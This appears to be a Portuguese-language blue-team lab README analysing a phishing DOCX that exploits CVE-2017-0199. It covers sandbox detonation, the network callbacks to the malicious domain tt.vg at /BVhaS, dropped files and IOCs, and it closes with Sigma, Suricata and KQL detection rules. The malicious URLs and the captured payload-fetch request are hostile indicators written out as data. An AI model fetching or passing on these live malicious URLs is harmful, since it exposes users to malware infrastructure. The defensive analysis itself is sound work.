
RCE-CVE-2017-0199-detection-analysis — Updated!
Este repositório contém uma análise completa de malware de blue team de um DOCX malicioso real que explora a CVE-2017-0199. O laboratório inclui execução em sandbox, forense de rede, extração de IOCs, mapeamento MITRE ATT&CK, revisão de arquivos descartados e regras de detecção. Capturas de tela das evidências estão incluídas na pasta evidence para documentação profissional.
🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – Análise Completa em Sandbox de Blue Team
Detonação Avançada de Malware • Comportamento do Exploit • IOCs • Engenharia de Detecção
🎯 1. Resumo Executivo
Este repositório documenta um arquivo **DOCX malicioso real** que explora a vulnerabilidade **CVE-2017-0199** de RCE do Microsoft Office. A amostra foi detonada dentro de uma **sandbox ANY.RUN com Windows 10**, expondo:
✔ Cadeia completa do exploit
✔ Callbacks de rede para domínio malicioso (tt.vg)
✔ Arquivos dropados e artefatos temporários
✔ Impressões digitais JA3
✔ Atividade de registro (Registry)
✔ Beaconing HTTP/HTTPS a partir do WINWORD.EXE
✔ IOCs completos de Blue Team e regras de detecção
🔍 2. Contexto do Cenário
Um documento intitulado “BankPaymAdviceVend.Report.docx” foi recebido por meio de um e-mail de phishing.
Uma vez detonado, o ANY.RUN o marcou instantaneamente como Malicioso e o associou a:
- Exploit de RCE do Word CVE-2017-0199
- WINWORD.EXE fazendo conexões HTTP/HTTPS ocultas
- Contato com o domínio curto malicioso
tt.vg - Tentativa de recuperação do payload remoto
/BVhaS
📄 3. Informações da Amostra
| Campo | Valor |
|---|---|
| Arquivo | BankPaymAdviceVend.Report.docx |
| Veredito | Atividade maliciosa |
| Tags | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| Sandbox | Windows 10 Pro x64 |
| Comportamento | Exploit → Beaconing de rede → Arquivos dropados |
🧬 4. Cadeia de Ataque (Diagrama de Alto Nível)
[ DOCX Malicioso ] │ ▼ [ Usuário Abre no Word ] │ ▼ [Exploit CVE-2017-0199 é Acionado] │ ▼ [WINWORD.EXE → tt.vg via HTTP/HTTPS] │ ▼ [Caminho Remoto: /BVhaS (GET / HEAD / OPTIONS)] │ ▼ [Arquivos Temporários, Objetos EMF, Arquivos de Cache Dropados] │ ▼ [Possível Payload de Próximo Estágio — Servidor Retornou 404]
yaml Copy code
🌐 5. Comportamento de Rede
5.1 Requisições DNS
Apenas um domínio era malicioso:
| Domínio | Reputação |
|---|---|
| tt.vg | 🔴 malicioso |
IPs resolvidos:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml Copy code
📡 5.2 Beaconing HTTP/HTTPS
O Word tentou buscar:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof
yaml Copy code
Requisição típica capturada:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino Copy code
O servidor respondeu:
HTTP/1.1 404 Not Found
yaml Copy code
📁 6. Arquivos Dropados
Artefatos Notáveis
- Vários arquivos
.tmp - Objetos gráficos
.gloxdo Office - Imagens EMF no cache do navegador:
%LOCALAPPDATA%\INetCache\Content.MSO\*.emf - Atalho de documento recente
.LNK - Logs do
index.dat - Alterações no dicionário de revisão do Office
🔐 7. Comportamento de Registro e do Sistema
O Word acessou:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml Copy code
✔ Normal para o Office
❌ Combinado com o exploit = comportamento claramente malicioso
💣 8. Detalhamento do Exploit — CVE-2017-0199
Tipo: Execução Remota de Código
Gatilho: DOCX malicioso carrega HTA remoto sem interação do usuário
Introduzido: Microsoft Word 2007–2016
Impacto: Atacante executa código arbitrário
Esta amostra tenta carregar um payload remoto de:
yaml Copy code
🧩 9. IOCs
🔥 9.1 Indicadores de Rede
Domínio: tt.vg
URLs: http://tt.vg/BVhaS https://tt.vg/BVhaS
IPs: 188.114.96.3 188.114.97.3 172.67.138.42
shell Copy code
🔐 9.2 Impressões Digitais JA3 SSL
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml Copy code
🔍 10. Ideias de Detecção (Sigma / Suricata / EDR)
Esta seção converte a análise técnica do BankPaymAdviceVend.Report.docx em artefatos de detecção práticos e prontos para produção que um SOC ou Blue Team pode implantar imediatamente. Ela inclui regras Sigma, assinaturas Suricata IDS e consultas de hunting em EDR.
🧾 10.1 Regra Sigma — WINWORD → tt.vg
Esta regra Sigma detecta qualquer conexão de rede iniciada por WINWORD.EXE
em direção ao domínio curto suspeito tt.vg nos logs de rede do Windows.
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 Qualquer sistema Office desatualizado que contate tt.vg por meio do WINWORD.EXE
deve acionar uma investigação imediata.
🌐 10.2 Regra Suricata — HTTP GET /BVhaS em tt.vg
Uma regra IDS Suricata que identifica uma requisição originada do Office para
GET /BVhaS no domínio malicioso tt.vg.
Isso captura a tentativa de recuperação do payload do exploit.
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 Altamente eficaz em ambientes que usam Suricata ou Zeek para monitorar tráfego de saída.
🛰️ 10.3 Consulta de Hunting em EDR — Indicadores de WINWORD + tt.vg
Uma consulta de hunting em KQL (Microsoft Defender) usada para identificar qualquer máquina no ambiente
que apresente beaconing malicioso semelhante para tt.vg ou seus endereços IP associados.
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 Objetivo: expandir uma única detonação em sandbox para uma busca completa em toda a empresa.
🧩 11. O Que Este Laboratório Demonstra
Este laboratório demonstra sua capacidade de analisar uma amostra real de DOCX de phishing de ponta a ponta, seguindo uma metodologia completa de nível SOC:
- Compreender como o CVE-2017-0199 é acionado dentro do Microsoft Word.
- Rastrear como o
WINWORD.EXEse torna um cliente HTTP/S inesperado. - Extrair IOCs de rede (domínios, URLs, IPs, hashes TLS JA3).
- Analisar arquivos dropados, atalhos recentes e acesso ao registro por valor forense.
- Transformar todas as descobertas em regras Sigma, Suricata e consultas de hunting em EDR.
Em outras palavras — este laboratório não para na detonação. Ele extrai inteligência de detecção real e acionável exatamente como um analista SOC profissional.
Projetado e Documentado por Ahmed Tarek — Blue Team